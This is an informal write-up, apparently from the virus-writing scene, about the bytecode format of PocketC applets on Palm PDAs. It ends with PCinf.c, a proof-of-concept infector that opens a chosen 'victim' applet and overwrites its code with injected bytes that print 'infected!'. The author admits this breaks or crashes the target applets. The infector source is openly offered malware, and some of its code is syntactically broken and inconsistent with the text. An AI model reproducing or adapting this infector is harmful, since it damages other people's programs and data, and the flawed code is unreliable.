hi there! the following is about palm pdas+pocketc so if you're not interested stop here -->.<-- this is dedicated to all who play around on their palm while waiting for the subway :) what exactly are you trying to tell us ? ======================================== i wanted to write an infector for pocketc applets..and that's what i found out. what is PocketC ? ================== PocketC provides a way to write and compile c code directly on a palm pda. compilation does not produce independent programs but a kind of applets which are executed via the pocketc virtual machine (PCvm). after compilation a database is created which contains 4 records named #0 to #4. #0 - contains code #1 - additional stuff (honestly i have no idea) #2 - static strings, function names #3 - same as #1 a closer look to #0 =================== at first there is some code which holds some information about the applet (i think). for example the first 2 bytes hold the size of record #0 - 2. which limits the possible size to 0xffff bytes ;). imho this is not that important. in any case in my examples the first 28 bytes (mostly followed by a NULL) are quite similar in all applets. next to that are functions followed by function main. on simple applets the last 9 bytes are mostly the same (or similar). observation: imho all sub functions end with a 0x2c could be smth like the well known int $0x80..dunno. a closer look to #2 =================== the first 6 bytes are again smth like a header..nothing useful except for the first 2 bytes which again hold the recordsize-2. at offset 7 the strings start. right before a string is a byte which contains the strlen of the string followed by a NULL. thus the end of the record is a NULL. extracted code snips ==================== // exits to app launcher exit() - "\x28\x70\2c"; // prints smth from #2 // byte 3 points on the string: // points on the null byte before a string entry puts() - "\x03\x00\x??\x07\x28\x01\x2c"; // launches a proggie named in #2 // works as puts() does.. launch() - "\x03\x00\x??\x07\x28\x58\x2c"; // ret // i'm not sure about that one at least it is the end // of main in simple applets. other func()'s return similar // perhaps this one works for them, too ret - "\x2b\x2f\x29"; // code to reserve a string variable (at least i think so..) // 0x?? = size "\x33\x00\x??\x0c\x03\x00\x00\x2b\x2d\x00\x??"; i do not yet know how more complex functions work so... this is enough information to write a little infector which injects simple code into a victim applet. oh by the way this code seems to be pic ;). all this was done using version 6.0 of pocketc. POC: ==== // PCinf.c /* this is a simple code infector for pocketc running on palm compatible hardware. it injects a string printing code. you can also use the launch() code and exec eg. "memo".. unpleasant side effects: *atm the applet gets "unusable" for its normal purpose :> *bigger applets crash due to this buggy "ret" thingie.. by qobaiashi */ #define LOCATION 0x1d main() { string name, code[11] = {"\x03\x90\x05\x07\x28\x01 \x2c\x2b\x2f\x29\x00"}; msg[12] = // 1st byte = strlen! {"\x0ainfected!\n\x00"}; int dbcntr = 0, cntr, record, size, r2size; char patch; pointer ptr; clear(); puts(" ---PCinf--- \n"); puts(" PocketC \n"); puts(" infector \n"); puts(" by qobaiashi\n\n"); name = gets("Applet to infect:"); if (strlen(name) == 0) { puts("[!] i need a victim..\n"); launch("PktC"); } puts("[*] using applet: "+name+ "\n"); // opening said database dbopen(name); //---string infector section---\\ //write a string into #2 // set record number: record = 0; dbrec(record); dbcntr = dbsize(); r2size = dbcntr;// for patching.. puts("using record "+record+"\n"); puts("record size = "+dbcntr+"\n"; // set offset in current record dbseek(dbcntr); puts("location is "+dbpos()+"\n\n"); size = strlen(msg); ptr = msg+size; dbwritex(ptr, 'c'); ptr = msg; dbwritex(ptr, 'ssize'); //---code infector section---\\ // set record number record = 0; dbcntr = dbsize(); puts("using record "+record+"\n"); puts("record size = "+dbcntr"\n"); // set offset in current record dbseek(LOCATION); puts("location is "+dbpos()+"\n\n"); // write out hostile code ptr = code; dbwritex(ptr, 'ssize'); // patch 0x00 into code ptr = code + size; dbseek(LOCATION+1); dbwritex(ptr, 'c'); // patch string offset in #2 into code dbseek(LOCATION+2); patch = r2size; dbwritex(&patch, 'c'); dbclose(); }